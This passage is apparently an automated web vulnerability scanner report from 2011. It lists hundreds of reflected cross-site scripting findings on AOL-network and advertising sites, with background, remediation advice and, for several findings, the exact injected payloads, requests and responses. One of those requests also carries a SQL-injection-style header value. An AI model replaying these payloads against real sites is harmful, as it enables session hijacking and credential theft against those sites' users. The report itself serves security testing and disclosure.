1.625. http://www.shelterpop.com/category/famous-homes/ [REST URL parameter 2]

1.626. http://www.shelterpop.com/category/famous-homes/ [name of an arbitrarily supplied request parameter]

1.627. http://www.shelterpop.com/category/fun-stuff/ [REST URL parameter 2]

1.628. http://www.shelterpop.com/category/fun-stuff/ [REST URL parameter 2]

1.629. http://www.shelterpop.com/category/fun-stuff/ [name of an arbitrarily supplied request parameter]

1.630. http://www.shelterpop.com/category/gardening/ [REST URL parameter 2]

1.631. http://www.shelterpop.com/category/gardening/ [REST URL parameter 2]

1.632. http://www.shelterpop.com/category/gardening/ [name of an arbitrarily supplied request parameter]

1.633. http://www.slashfood.com/ [name of an arbitrarily supplied request parameter]

1.634. http://www.smartmoney.com/investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/ [REST URL parameter 2]

1.635. http://www.smartmoney.com/investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/ [REST URL parameter 3]

1.636. http://www.smartmoney.com/investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/ [cid parameter]

1.637. http://www.smartmoney.com/investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/ [cid parameter]

1.638. http://www.smartmoney.com/investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/ [cid parameter]

1.639. http://www.smartmoney.com/investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/ [name of an arbitrarily supplied request parameter]

1.640. http://www.smartmoney.com/investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/ [name of an arbitrarily supplied request parameter]

1.641. http://www.smartmoney.com/investing/stocks/should-investors-panic-over-egypt-1296838406557/ [REST URL parameter 2]

1.642. http://www.smartmoney.com/investing/stocks/should-investors-panic-over-egypt-1296838406557/ [REST URL parameter 3]

1.643. http://www.smartmoney.com/investing/stocks/should-investors-panic-over-egypt-1296838406557/ [cid parameter]

1.644. http://www.smartmoney.com/investing/stocks/should-investors-panic-over-egypt-1296838406557/ [cid parameter]

1.645. http://www.smartmoney.com/investing/stocks/should-investors-panic-over-egypt-1296838406557/ [cid parameter]

1.646. http://www.smartmoney.com/investing/stocks/should-investors-panic-over-egypt-1296838406557/ [name of an arbitrarily supplied request parameter]

1.647. http://www.smartmoney.com/investing/stocks/should-investors-panic-over-egypt-1296838406557/ [name of an arbitrarily supplied request parameter]

1.648. http://www.smartmoney.com/spending/travel/skiing-with-olympic-stars-1296852410520/ [REST URL parameter 2]

1.649. http://www.smartmoney.com/spending/travel/skiing-with-olympic-stars-1296852410520/ [REST URL parameter 3]

1.650. http://www.smartmoney.com/spending/travel/skiing-with-olympic-stars-1296852410520/ [cid parameter]

1.651. http://www.smartmoney.com/spending/travel/skiing-with-olympic-stars-1296852410520/ [cid parameter]

1.652. http://www.smartmoney.com/spending/travel/skiing-with-olympic-stars-1296852410520/ [cid parameter]

1.653. http://www.smartmoney.com/spending/travel/skiing-with-olympic-stars-1296852410520/ [name of an arbitrarily supplied request parameter]

1.654. http://www.smartmoney.com/spending/travel/skiing-with-olympic-stars-1296852410520/ [name of an arbitrarily supplied request parameter]

1.655. http://www.spinner.com/2011/02/01/super-bowl-halftime-show/ [REST URL parameter 3]

1.656. http://www.stylelist.com/ [name of an arbitrarily supplied request parameter]

1.657. http://www.stylelist.com/fashion-week [name of an arbitrarily supplied request parameter]

1.658. http://www.stylelist.com/fashion-week [name of an arbitrarily supplied request parameter]

1.659. http://www.stylelist.com/fashion-week [name of an arbitrarily supplied request parameter]

1.660. http://www.stylelist.com/hair/ [name of an arbitrarily supplied request parameter]

1.661. http://www.stylelist.com/hair/ [name of an arbitrarily supplied request parameter]

1.662. http://www.switched.com/ [name of an arbitrarily supplied request parameter]

1.663. http://www.switched.com/2011/02/05/do-ipad-magazines-take-too-long-to-download/ [name of an arbitrarily supplied request parameter]

1.664. http://www.switched.com/2011/02/05/switched-roundup-top-posts-this-week/ [name of an arbitrarily supplied request parameter]

1.665. http://www.switched.com/2011/02/06/the-wii-plays-takes-gameplay-to-the-live-stage/ [name of an arbitrarily supplied request parameter]

1.666. http://www.switched.com/tag/justtellmewhattoget [REST URL parameter 2]

1.667. http://www.switched.com/tag/justtellmewhattoget [REST URL parameter 2]

1.668. http://www.switched.com/tag/justtellmewhattoget [name of an arbitrarily supplied request parameter]

1.669. http://www.thatsfit.com/ [name of an arbitrarily supplied request parameter]

1.670. http://www.thatsfit.com/category/diet-and-weight-loss/ [REST URL parameter 2]

1.671. http://www.thatsfit.com/category/diet-and-weight-loss/ [name of an arbitrarily supplied request parameter]

1.672. http://www.thatsfit.com/category/fit-travel/ [REST URL parameter 2]

1.673. http://www.thatsfit.com/category/fit-travel/ [name of an arbitrarily supplied request parameter]

1.674. http://www.tuaw.com/ [name of an arbitrarily supplied request parameter]

1.675. http://www.tuaw.com/2011/02/05/in-arlington-tx-try-the-official-super-bowl-app/ [name of an arbitrarily supplied request parameter]

1.676. http://www.tuaw.com/2011/02/06/app-reviews-stratego-vs-the-general/ [name of an arbitrarily supplied request parameter]

1.677. http://www.tuaw.com/2011/02/06/mobile-version-of-itunes-store-gets-genius-recommendations/ [name of an arbitrarily supplied request parameter]

1.678. http://www.tvsquad.com/category/tv-replay [REST URL parameter 2]

1.679. http://www.tvsquad.com/category/tv-replay [REST URL parameter 2]

1.680. http://www.walletpop.com/2011/02/01/amazon-fights-to-keep-sales-tax-advantage-in-tennessee/ [REST URL parameter 1]

1.681. http://www.walletpop.com/2011/02/03/1040-tax-forms-which-one-should-you-use/ [REST URL parameter 1]

1.682. http://www.walletpop.com/2011/02/03/government-issues-recall-of-another-lethal-crib/ [REST URL parameter 1]

1.683. http://www.walletpop.com/2011/02/04/a-tax-credit-for-savers-do-you-qualify/ [REST URL parameter 1]

1.684. http://www.walletpop.com/2011/02/04/help-my-tax-documents-are-late/ [REST URL parameter 1]

1.685. http://www.walletpop.com/2011/02/05/wine-deals-for-valentines-day/ [REST URL parameter 1]

1.686. http://www.walletpop.com/banking [REST URL parameter 1]

1.687. http://www.walletpop.com/banking/ [REST URL parameter 1]

1.688. http://www.walletpop.com/blog/category/fantastic-freebies/ [REST URL parameter 1]

1.689. http://www.walletpop.com/blog/category/fantastic-freebies/ [REST URL parameter 2]

1.690. http://www.walletpop.com/blog/category/fantastic-freebies/ [REST URL parameter 3]

1.691. http://www.walletpop.com/blog/media/awards_promo_bottom.gif [REST URL parameter 1]

1.692. http://www.walletpop.com/blog/media/awards_promo_bottom.gif [REST URL parameter 2]

1.693. http://www.walletpop.com/blog/media/awards_promo_bottom.gif [REST URL parameter 3]

1.694. http://www.walletpop.com/blog/media/awards_promo_middle.gif [REST URL parameter 1]

1.695. http://www.walletpop.com/blog/media/awards_promo_middle.gif [REST URL parameter 2]

1.696. http://www.walletpop.com/blog/media/awards_promo_middle.gif [REST URL parameter 3]

1.697. http://www.walletpop.com/calculators [REST URL parameter 1]

1.698. http://www.walletpop.com/category/debt/ [REST URL parameter 1]

1.699. http://www.walletpop.com/category/debt/ [REST URL parameter 2]

1.700. http://www.walletpop.com/category/fraud/ [REST URL parameter 1]

1.701. http://www.walletpop.com/category/fraud/ [REST URL parameter 2]

1.702. http://www.walletpop.com/category/insurance/ [REST URL parameter 1]

1.703. http://www.walletpop.com/category/insurance/ [REST URL parameter 2]

1.704. http://www.walletpop.com/category/loans/ [REST URL parameter 1]

1.705. http://www.walletpop.com/category/loans/ [REST URL parameter 2]

1.706. http://www.walletpop.com/category/recalls/ [REST URL parameter 1]

1.707. http://www.walletpop.com/category/recalls/ [REST URL parameter 2]

1.708. http://www.walletpop.com/category/retire/ [REST URL parameter 1]

1.709. http://www.walletpop.com/category/retire/ [REST URL parameter 2]

1.710. http://www.walletpop.com/college-finance [REST URL parameter 1]

1.711. http://www.walletpop.com/college-finance/ [REST URL parameter 1]

1.712. http://www.walletpop.com/credit [REST URL parameter 1]

1.713. http://www.walletpop.com/credit/ [REST URL parameter 1]

1.714. http://www.walletpop.com/credit/credit-cards/ [REST URL parameter 1]

1.715. http://www.walletpop.com/credit/credit-cards/ [REST URL parameter 2]

1.716. http://www.walletpop.com/crib-recall [REST URL parameter 1]

1.717. http://www.walletpop.com/debt [REST URL parameter 1]

1.718. http://www.walletpop.com/debt/ [REST URL parameter 1]

1.719. http://www.walletpop.com/fraud [REST URL parameter 1]

1.720. http://www.walletpop.com/insurance [REST URL parameter 1]

1.721. http://www.walletpop.com/insurance/ [REST URL parameter 1]

1.722. http://www.walletpop.com/loans [REST URL parameter 1]

1.723. http://www.walletpop.com/loans/ [REST URL parameter 1]

1.724. http://www.walletpop.com/mortgages [REST URL parameter 1]

1.725. http://www.walletpop.com/mortgages/ [REST URL parameter 1]

1.726. http://www.walletpop.com/mortgages/refinancing [REST URL parameter 1]

1.727. http://www.walletpop.com/mortgages/refinancing [REST URL parameter 2]

1.728. http://www.walletpop.com/recalls [REST URL parameter 1]

1.729. http://www.walletpop.com/recession [REST URL parameter 1]

1.730. http://www.walletpop.com/retirement [REST URL parameter 1]

1.731. http://www.walletpop.com/retirement/ [REST URL parameter 1]

1.732. http://www.walletpop.com/specials [REST URL parameter 1]

1.733. http://www.walletpop.com/taxes [REST URL parameter 1]

1.734. http://www.walletpop.com/taxes [name of an arbitrarily supplied request parameter]

1.735. http://www.walletpop.com/taxes/ [REST URL parameter 1]

1.736. http://www.walletpop.com/taxes/ [name of an arbitrarily supplied request parameter]

1.737. http://www.walletpop.com/taxes/advice [REST URL parameter 1]

1.738. http://www.walletpop.com/taxes/advice [REST URL parameter 2]

1.739. http://www.walletpop.com/taxes/advice [name of an arbitrarily supplied request parameter]

1.740. http://www.walletpop.com/taxes/advice/ [REST URL parameter 1]

1.741. http://www.walletpop.com/taxes/advice/ [REST URL parameter 2]

1.742. http://www.walletpop.com/taxes/advice/ [name of an arbitrarily supplied request parameter]

1.743. http://www.walletpop.com/taxes/article/10-most-common-tax-mistakes-to-avoid/888611 [REST URL parameter 2]

1.744. http://www.walletpop.com/taxes/article/10-most-common-tax-mistakes-to-avoid/888611 [REST URL parameter 3]

1.745. http://www.walletpop.com/taxes/article/10-most-common-tax-mistakes-to-avoid/888611 [REST URL parameter 4]

1.746. http://www.walletpop.com/taxes/basics [REST URL parameter 1]

1.747. http://www.walletpop.com/taxes/basics [REST URL parameter 2]

1.748. http://www.walletpop.com/taxes/basics [name of an arbitrarily supplied request parameter]

1.749. http://www.walletpop.com/taxes/basics/ [REST URL parameter 1]

1.750. http://www.walletpop.com/taxes/basics/ [REST URL parameter 2]

1.751. http://www.walletpop.com/taxes/basics/ [name of an arbitrarily supplied request parameter]

1.752. http://www.walletpop.com/taxes/credit [REST URL parameter 1]

1.753. http://www.walletpop.com/taxes/credit [REST URL parameter 2]

1.754. http://www.walletpop.com/taxes/credit [name of an arbitrarily supplied request parameter]

1.755. http://www.walletpop.com/taxes/credit/ [REST URL parameter 1]

1.756. http://www.walletpop.com/taxes/credit/ [REST URL parameter 2]

1.757. http://www.walletpop.com/taxes/credit/ [name of an arbitrarily supplied request parameter]

1.758. http://www.walletpop.com/taxes/forms [REST URL parameter 1]

1.759. http://www.walletpop.com/taxes/forms [REST URL parameter 2]

1.760. http://www.walletpop.com/taxes/forms [name of an arbitrarily supplied request parameter]

1.761. http://www.walletpop.com/taxes/forms/ [REST URL parameter 1]

1.762. http://www.walletpop.com/taxes/forms/ [REST URL parameter 2]

1.763. http://www.walletpop.com/taxes/forms/ [name of an arbitrarily supplied request parameter]

1.764. http://www.walletpop.com/taxes/online [REST URL parameter 1]

1.765. http://www.walletpop.com/taxes/online [REST URL parameter 2]

1.766. http://www.walletpop.com/taxes/online [name of an arbitrarily supplied request parameter]

1.767. http://www.walletpop.com/taxes/online/ [REST URL parameter 1]

1.768. http://www.walletpop.com/taxes/online/ [REST URL parameter 2]

1.769. http://www.walletpop.com/taxes/online/ [name of an arbitrarily supplied request parameter]

1.770. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

1.771. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

1.772. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

1.773. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

1.774. http://ar.voicefive.com/bmx3/broker.pli [ar_da39f516a098b3de) ar_p85001580 cookie]

1.775. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

1.776. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

1.777. http://ar.voicefive.com/bmx3/broker.pli [ar_p68511049 cookie]

1.778. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

1.779. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

1.780. http://blackvoices.aol.com/ [name of an arbitrarily supplied request parameter]

1.781. http://body.aol.com/diet-fitness [name of an arbitrarily supplied request parameter]

1.782. http://body.aol.com/health [name of an arbitrarily supplied request parameter]

1.783. http://massively.com/ [name of an arbitrarily supplied request parameter]

1.784. http://memberdirectory.aol.com/aolus/searchProfiles [REST URL parameter 2]

1.785. http://mmafighting.com/ [name of an arbitrarily supplied request parameter]

1.786. http://new.mapquest.com/accelerator [name of an arbitrarily supplied request parameter]

1.787. http://new.mapquest.com/directions [name of an arbitrarily supplied request parameter]

1.788. http://new.mapquest.com/routeplanner [name of an arbitrarily supplied request parameter]

1.789. http://ocp.cbs.com/pacific/Response.jsp [_PACIFIC_COMMENTS cookie]

1.790. http://reference.aol.com/atlas [name of an arbitrarily supplied request parameter]

1.791. http://seed.com/ [name of an arbitrarily supplied request parameter]

1.792. http://switched.com/ [name of an arbitrarily supplied request parameter]

1.793. http://www.downloadsquad.com/ [name of an arbitrarily supplied request parameter]

1.794. http://www.greendaily.com/ [name of an arbitrarily supplied request parameter]

1.795. http://www.holidash.com/ [name of an arbitrarily supplied request parameter]

1.796. http://www.kol.com/ [name of an arbitrarily supplied request parameter]

1.797. http://www.massively.com/ [name of an arbitrarily supplied request parameter]

1.798. http://www.new.mapquest.com/ [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 798 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aol_pp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3015e"%3bc03e6044435 was submitted in the REST URL parameter 1. This input was echoed as 3015e";c03e6044435 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork3015e"%3bc03e6044435/aol_pp HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B; s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE];

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3240247308.3021032781.3908175104; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:46 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10535
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm02 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm02.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork3015e";c03e6044435";
s_265.prop2="aol_pp";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

1.2. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aolcom_terms

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b307b"%3b18c402aedf2 was submitted in the REST URL parameter 1. This input was echoed as b307b";18c402aedf2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetworkb307b"%3b18c402aedf2/aolcom_terms HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B; s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE];

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244834828.3642051917.360777472; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:46 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10547
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm29 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm29.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetworkb307b";18c402aedf2";
s_265.prop2="aolcom_terms";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

1.3. http://about.aol.com/aolnetwork/mem_tos [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/mem_tos

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6d7d"%3b33da55b5274 was submitted in the REST URL parameter 1. This input was echoed as a6d7d";33da55b5274 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetworka6d7d"%3b33da55b5274/mem_tos HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B; s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE];

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244900364.789990733.3773433344; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:46 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10537
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm30 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm30.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetworka6d7d";33da55b5274";
s_265.prop2="mem_tos";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

1.4. http://about.aol.com/aolnetwork/trademarks [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/trademarks

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba4d3"%3b0da027c5667 was submitted in the REST URL parameter 1. This input was echoed as ba4d3";0da027c5667 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetworkba4d3"%3b0da027c5667/trademarks HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B; s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE];

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244834828.3642051917.528549632; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:47 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10541
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm29 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm29.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetworkba4d3";0da027c5667";
s_265.prop2="trademarks";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

1.5. http://about.aol.com/sitemap/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /sitemap/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2cb1"%3b0c58d64b746 was submitted in the REST URL parameter 1. This input was echoed as b2cb1";0c58d64b746 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemapb2cb1"%3b0c58d64b746/ HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
Referer: http://latino.aol.com/$%7C.ivillage.com.*/1%7Cwww.ivillage.com/(celeb-news%7Centertainment-photos%7Ctv%7Cfor-kids%7Cvideo%7Centertainment%7Cmovies%7Cfood%7Crecipes%7Ctable-talk%7Cfood-for-kids%7Cfood-advice%7Cfood-news%7Cfood-video?110145548'%20or%201%3d1--%20=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244834828.3642051917.1132070656; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:12:18 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Cteonnt-Length: 10499
Connection: close
Content-Length: 10499


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm29 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm29.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="sitemapb2cb1";0c58d64b746";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

1.6. http://ad.aggregateknowledge.com/iframe!t=639! [clk1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.aggregateknowledge.com
Path:   /iframe!t=639!

Issue detail

The value of the clk1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c48dd"%3balert(1)//51cb3eab07a was submitted in the clk1 parameter. This input was echoed as c48dd";alert(1)//51cb3eab07a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

